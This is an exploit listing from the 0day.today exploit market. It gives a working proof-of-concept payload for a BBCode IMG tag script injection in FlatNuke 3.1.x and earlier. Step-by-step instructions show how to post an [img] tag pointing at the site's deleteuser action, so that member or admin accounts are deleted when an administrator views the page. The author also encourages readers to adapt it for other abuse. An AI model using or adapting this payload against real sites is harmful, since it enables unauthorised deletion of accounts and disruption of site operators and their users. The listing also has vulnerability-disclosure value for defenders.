[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

FlatNuke <= 3.1.x BBCode IMG Tag Script Injection Vulnerability

Author
StAkeR
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-22878
Category
web applications
Date add
16-11-2014
Platform
php
-------------------------------------------------------------------------
 [+] FlatNuke <= 3.1.x (viewnews) BBCode IMG Tag Script Injection PoC
 -------------------------------------------------------------------------
 [*] Discovered by Juri Gianni - Turin,Italy
 [*] staker - staker[at]hotmail[dot]it / shrod9[at]gmail[dot]com
 [*] Discovered on 14/11/2014
 [*] Site Vendor: http://www.flatnuke.org
 [*] Category: WebApp
 [*] BUG: BBCOODE IMG Tag Script Injection
 [-] NOTE: THIS URL ALLOWS TO DELETE THE MEMBERS, BUT YOU CAN DO OTHER, USE YOUR FANTASY!!!
 --------------------------------------------------------------------------------------------------
 [1] Go to the news and write in a new post or in a reply the code below:
 ---------------------------------------------------------------------------------------------------
 [img]http://localhost/flatnuke/index.php?mod=none_Login&action=deleteuser&user=[ANY USERNAME][/img]
 ----------------------------------------------------------------------------------------------------
 [2] Modify [ANY USERNAME] with a real member of the website.
 -------------------------------------------------------------
 EXAMPLE:
 [img]http://localhost/flatnuke/index.php?mod=none_Login&action=deleteuser&user=staker[/img] 
 --------------------------------------------------------------------------------------------------
 [-] When the ADMIN will see the page, the user will be automatically deleted.
 [-] You can delete the admin account too!
 ---------------------------------------------------------------------------------------------------

#  0day.today [2024-11-15]  #